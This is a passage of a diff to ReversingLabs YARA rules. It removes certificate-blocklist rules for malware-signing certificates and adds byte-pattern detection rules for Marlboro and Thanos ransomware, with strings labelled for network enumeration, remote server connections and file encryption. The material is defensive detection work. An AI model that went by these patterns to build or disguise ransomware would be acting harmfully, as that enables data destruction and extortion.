+            EF ?? 57 8D 46 ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? F6 06 ?? 74 ?? 50 E8 ?? ?? ??
+            ?? 8B 56 ?? 8B 45 ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C3 ?? 83 C6 ?? 3B 5C 24 ?? 0F
+            82 ?? ?? ?? ?? 8B 74 24 ?? E9 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DataNext s.r.o." and ( pe.signatures [ i ] . serial == "00:84:f8:42:f6:d3:3c:d2:f2:5b:88:dd:17:10:e2:11:37" or pe.signatures [ i ] . serial == "84:f8:42:f6:d3:3c:d2:f2:5b:88:dd:17:10:e2:11:37" ) and 1586775720 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_network_resources ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4Fbcaa289Ba925B4E247809B6B028202 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Marlboro : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Marlboro ransomware."
 		author = "ReversingLabs"
-		id = "d0c4c6c0-d8e3-5efc-a87b-01d1f98a2c18"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7cd3b436-47e3-5711-9b59-cef70efe3b45"
+		date = "2020-07-23"
+		modified = "2020-07-23"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3922-L3938"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c41a4f9ccda54b9735313edf9042b831e6eaca149c089f74a823cee6719e1064"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Marlboro.yara#L1-L117"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d36c3cf52af47e9f638f58aabc19298e8c58831c3083f82e4c194319503eeaaa"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Marlboro"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kimjac ApS" and pe.signatures [ i ] . serial == "4f:bc:aa:28:9b:a9:25:b4:e2:47:80:9b:6b:02:82:02" and 1588227220 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_1F2E8Effbb08C7Dbcc7A7F2D835457B5 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "cf032593-e742-56d5-a579-3f38a31e2c0c"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3940-L3956"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0b446641617d435c3d312592957e19c3d391b0149eafcf9ac2da51e8d9080eb4"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$ping_apnic = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 0F 57
+            C0 F3 0F 7F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_server_connection_1 = {
+            BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D7 8B C8 E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B
+            C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 8D 4D ??
+            50 E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
+        }
+		$remote_server_connection_2 = {
+            84 C0 74 ?? B3 ?? EB ?? 32 DB C7 45 ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 83 7D
+            ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3D ?? ?? ??
+            ?? 74 ?? 8D 80 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? [0-3] 8B 85 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 C6
+            45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 8B F0 85 C9 74 ?? 8B
+            01 FF 50 ?? 85 C0 74 ?? 8B 10 8B C8 6A ?? FF 12 8B 06 8B CE 6A ?? 8B 40 ?? FF D0
+        }
+		$remote_server_connection_3 = {
+            50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 83 C4 ?? 8B 7D ?? 8B 08 8B 49
+            ?? F6 44 01 ?? ?? 75 ?? 8B 75 ?? 8D 4D ?? 83 FB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F
+            43 CF 3B F0 0F 42 C6 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 83 FE ?? 73 ?? 83 C8 ??
+            EB ?? 33 C0 83 FE ?? 0F 95 C0 85 C0 0F 94 C0 84 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 FB ?? 72
+        }
+		$remote_server_connection_4 = {
+            57 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D
+            ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            C6 EB ?? 8B 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8B 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? C3 8B 85 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33
+            CD E8 ?? ?? ?? ?? 8B E5 5D
+        }
+		$encrypt_file = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 51 C7 45 ?? ?? ?? ?? ?? 8D 55 ??
+            8B 35 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 51 0F 43 45 ?? 8D 8D ?? ?? ??
+            ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BF ?? ?? ?? ??
+            8B 40 ?? 75 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 0B C7 EB ?? 03 C8 33 C0 39
+            41 ?? 0F 44 C7 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 8D 8D ??
+            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ??
+            75 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? EB ?? 03 C8 33 C0 39 41 ??
+            0F 44 C7 6A ?? 50 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 83 EC
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 6A ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8D 8D ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 75 ?? 8D 64 24 ?? 51 8D 55 ??
+            8B CE E8 ?? ?? ?? ?? 51 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45
+            ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 74 ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03
+            C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8
+            8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D
+            45 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B 40 ??
+            C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ??
+            ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 85 ??
+            ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41
+            ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ??
+            C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ??
+            ?? ?? 8D 45 ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF
+            75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? C7 45 ?? ?? ??
+            ?? ?? 66 89 45 ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ??
+            ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RTI, OOO" and pe.signatures [ i ] . serial == "1f:2e:8e:ff:bb:08:c7:db:cc:7a:7f:2d:83:54:57:b5" and 1581382360 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $ping_apnic and $remote_server_connection_1 and $remote_server_connection_2 and $remote_server_connection_3 and $remote_server_connection_4 and $encrypt_file
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Aeba4C39306Fdd022849867801645814 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Thanos : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Thanos ransomware."
 		author = "ReversingLabs"
-		id = "f8cb78cf-541c-5038-b7af-83679c978ec8"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "e607255d-45a6-573d-956e-f6faa2aa7e9f"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3958-L3976"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "82c149f1d8ef93a0df2035690c5cdca935236687bc36a35a84c3d6610eb6902c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Thanos.yara#L1-L106"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f6bc0c2188a04d2fb2a82a6b6d6cdf7763c32047bec725fe07f01415edf0b4cd"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Thanos"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SK AI MAS GmbH" and ( pe.signatures [ i ] . serial == "00:ae:ba:4c:39:30:6f:dd:02:28:49:86:78:01:64:58:14" or pe.signatures [ i ] . serial == "ae:ba:4c:39:30:6f:dd:02:28:49:86:78:01:64:58:14" ) and 1579478400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_028D50Ae0C554B49148E82Db5B1C2699 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "76ccda8a-bdea-5db2-a3a4-11292bfb3c95"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3978-L3994"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e3cc0066cad56d78a3f42e092befa3b0855b2ed33c8465c5ecbb19fec082d35e"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? DD
+            ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 6C 7E ?? ?? ?? ??
+            28 ?? ?? ?? ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 35 ?? 7E ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08
+            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08
+            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 00 11
+            ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11
+            ?? 6F ?? ?? ?? ?? 00 DC 00 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38
+            ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0D 00 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D
+            ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F
+        }
+		$find_files_p2 = {
+            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? 38 ?? ?? ?? ?? 00 00 09 72 ?? ?? ??
+            ?? 17 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0C 00 00
+            08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A
+        }
+		$find_files_p3 = {
+            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 00 6F
+            ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            2D ?? 08 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 6F ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? DD ?? ?? ?? ?? 08 6F ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 6C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 23 ?? ??
+            ?? ?? ?? ?? ?? ?? 5A 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 35 ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 00 00 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 00 11 ?? 6F ?? ?? ?? ?? 13 ??
+            11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 DC
+            00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ??
+            ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 00 00 DE ??
+            26 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 06 13 ?? 2B ?? 11 ?? 2A
+        }
+		$encrypt_files = {
+            73 ?? ?? ?? ?? 13 ?? 11 ?? 03 7D ?? ?? ?? ?? 11 ?? 04 7D ?? ?? ?? ?? 11 ?? 05 7D ?? ??
+            ?? ?? 11 ?? 0E ?? 7D ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ??
+            80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 28
+            ?? ?? ?? ?? 0A 06 8E 69 16 FE 02 16 FE 01 13 ?? 11 ?? 2D ?? 00 16 0B 2B ?? 00 06 07 9A
+            6F ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 06 07 9A 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 06 07 9A 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
+            00 00 00 00 07 17 58 0B 07 06 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 00 2B ?? 00 16 0B 2B ??
+            00 7E ?? ?? ?? ?? 02 07 9A 6F ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 02 07 9A
+            6F ?? ?? ?? ?? 00 00 00 07 17 58 0B 07 02 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 00 6F ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 00 6F ?? ?? ??
+            ?? 26 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 14 0D 73 ?? ?? ?? ?? 13
+            ?? 11 ?? 11 ?? 7D ?? ?? ?? ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 00 7E ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2D ?? 00 09 2D ?? 11 ?? FE 06 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 0D 2B ?? 09 73 ?? ?? ?? ?? 0C 08 1A 6F ?? ?? ?? ?? 00 08 16 6F
+            ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 2B ?? 00 11 ?? 7B ?? ?? ??
+            ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ??
+            28 ?? ?? ?? ?? 00 00 00 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE
+            16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 00 2A
+        }
+		$remote_connection = {
+            00 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 19 6F ?? ?? ?? ??
+            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 02 28 ?? ?? ?? ?? 06 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 06 28 ?? ?? ?? ?? 0C DE ?? 26 00 00 DE ?? 00 7E ??
+            ?? ?? ?? 0C 2B ?? 00 08 2A
+        }
 
